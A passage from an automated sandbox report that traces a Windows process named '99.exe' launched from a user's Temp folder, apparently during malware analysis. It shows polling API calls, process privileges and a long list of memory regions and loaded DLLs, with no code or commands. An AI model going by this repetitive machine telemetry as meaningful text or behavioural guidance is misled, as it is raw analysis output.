lpBytesLeftThisMessage=0x0) returned 1 [0293.131] Sleep (dwMilliseconds=0x64) [0293.536] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0293.536] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0293.536] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0293.537] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0293.537] Sleep (dwMilliseconds=0x64) [0293.646] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0293.646] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0293.646] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0293.646] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0293.646] Sleep (dwMilliseconds=0x64) [0293.755] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0293.755] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0293.755] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0293.755] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0293.755] Sleep (dwMilliseconds=0x64) Process: id = "18" image_name = "99.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe" page_root = "0x66a10000" os_pid = "0xc88" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xec4" cmd_line = "\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4891 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4892 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4893 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4894 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4895 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 4896 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 4897 start_va = 0x400000 end_va = 0x825fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "99.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe") Region: id = 4898 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4899 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4900 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 4901 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 4902 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 4903 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 4904 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4905 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4906 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4907 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4908 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4909 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4910 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4911 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4912 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4913 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4914 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 4915 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4916 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 4917 start_va = 0x290000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4918 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4920 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4921 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4922 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4923 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4924 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4925 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4926 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4927 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 4928 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 4929 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4930 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4931 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4932 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4933 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4934 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4935 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4936 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4937 start_va = 0x6bed0000 end_va = 0x6bf01fff monitored = 0 entry_point = 0x6bed37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 4943 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4944 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4945 start_va = 0x75a80000 end_va = 0x75bb5fff monitored = 0 entry_point = 0x75a81b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 4946 start_va = 0x76d80000 end_va = 0x76e74fff monitored = 0 entry_point = 0x76d81865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 4947 start_va = 0x75880000 end_va = 0x75a7afff monitored = 0 entry_point = 0x758822d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 4948 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4949 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4950 start_va = 0x75650000 end_va = 0x75770fff monitored = 0 entry_point = 0x7565158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 4951 start_va = 0x76d70000 end_va = 0x76d7bfff monitored = 0 entry_point = 0x76d7238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 4952 start_va = 0x6c5c0000 end_va = 0x6c74ffff monitored = 0 entry_point = 0x6c65d026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 4953 start_va = 0x830000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 4954 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4955 start_va = 0x830000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 4956 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4957 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4958 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4959 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4960 start_va = 0xa20000 end_va = 0xba0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 4961 start_va = 0xbb0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 4974 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4975 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4980 start_va = 0x290000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4981 start_va = 0x300000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 4982 start_va = 0x1fb0000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 4983 start_va = 0x290000 end_va = 0x290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4984 start_va = 0x290000 end_va = 0x2d4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4985 start_va = 0x290000 end_va = 0x291fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4986 start_va = 0x290000 end_va = 0x291fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4987 start_va = 0x290000 end_va = 0x293fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4988 start_va = 0x74520000 end_va = 0x74528fff monitored = 0 entry_point = 0x74521220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4989 start_va = 0x6be10000 end_va = 0x6be16fff monitored = 0 entry_point = 0x6be11120 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 4990 start_va = 0x2010000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 4991 start_va = 0x74430000 end_va = 0x744affff monitored = 0 entry_point = 0x744437c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4992 start_va = 0x2110000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 4993 start_va = 0x21f0000 end_va = 0x22cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021f0000" filename = "" Region: id = 4994 start_va = 0x22d0000 end_va = 0x259efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5001 start_va = 0x290000 end_va = 0x290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 5002 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 5003 start_va = 0x2b0000 end_va = 0x2b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 5004 start_va = 0x2c0000 end_va = 0x2c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 5005 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 5006 start_va = 0x2e0000 end_va = 0x2e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 5007 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 5008 start_va = 0x9c0000 end_va = 0x9c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 5009 start_va = 0x9d0000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 5010 start_va = 0x9e0000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 5011 start_va = 0x9f0000 end_va = 0x9f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 5012 start_va = 0xa00000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 5013 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5014 start_va = 0x21b0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 5015 start_va = 0x2120000 end_va = 0x2120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 5016 start_va = 0x2130000 end_va = 0x2130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 5017 start_va = 0x2140000 end_va = 0x2140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 5018 start_va = 0x2150000 end_va = 0x2150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 5019 start_va = 0x2160000 end_va = 0x2160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 5020 start_va = 0x2170000 end_va = 0x2170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 5021 start_va = 0x2180000 end_va = 0x2180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 5022 start_va = 0x2190000 end_va = 0x2190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 5023 start_va = 0x21a0000 end_va = 0x21a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 5024 start_va = 0x25a0000 end_va = 0x25a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 5025 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5026 start_va = 0x25c0000 end_va = 0x25c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 5027 start_va = 0x25d0000 end_va = 0x25d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 5028 start_va = 0x25e0000 end_va = 0x25e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 5029 start_va = 0x25f0000 end_va = 0x25f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 5030 start_va = 0x2600000 end_va = 0x2600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 5031 start_va = 0x2610000 end_va = 0x2610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 5032 start_va = 0x2620000 end_va = 0x2620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 5033 start_va = 0x2630000 end_va = 0x2630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 5034 start_va = 0x2640000 end_va = 0x2640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 5035 start_va = 0x2650000 end_va = 0x2650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 5036 start_va = 0x2660000 end_va = 0x2660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 5037 start_va = 0x2670000 end_va = 0x2670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 5038 start_va = 0x2680000 end_va = 0x2680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 5039 start_va = 0x2690000 end_va = 0x2690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 5040 start_va = 0x26a0000 end_va = 0x26a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 5041 start_va = 0x26b0000 end_va = 0x26b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 5042 start_va = 0x26c0000 end_va = 0x26c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 5043 start_va = 0x26d0000 end_va = 0x26d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 5044 start_va = 0x26e0000 end_va = 0x26e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 5045 start_va = 0x26f0000 end_va = 0x26f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 5046 start_va = 0x2700000 end_va = 0x2700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 5047 start_va = 0x2710000 end_va = 0x2710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 5048 start_va = 0x2720000 end_va = 0x2720fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 5049 start_va = 0x2730000 end_va = 0x2730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 5050 start_va = 0x2740000 end_va = 0x2740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 5051 start_va = 0x2750000 end_va = 0x2750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 5052 start_va = 0x2760000 end_va = 0x2760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5053 start_va = 0x2770000 end_va = 0x2770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 5054 start_va = 0x2780000 end_va = 0x2780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 5055 start_va = 0x2790000 end_va = 0x2790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 5056 start_va = 0x27a0000 end_va = 0x27a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 5057 start_va = 0x27b0000 end_va = 0x27b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 5058 start_va = 0x27c0000 end_va = 0x27c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 5059 start_va = 0x27d0000 end_va = 0x27d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 5060 start_va = 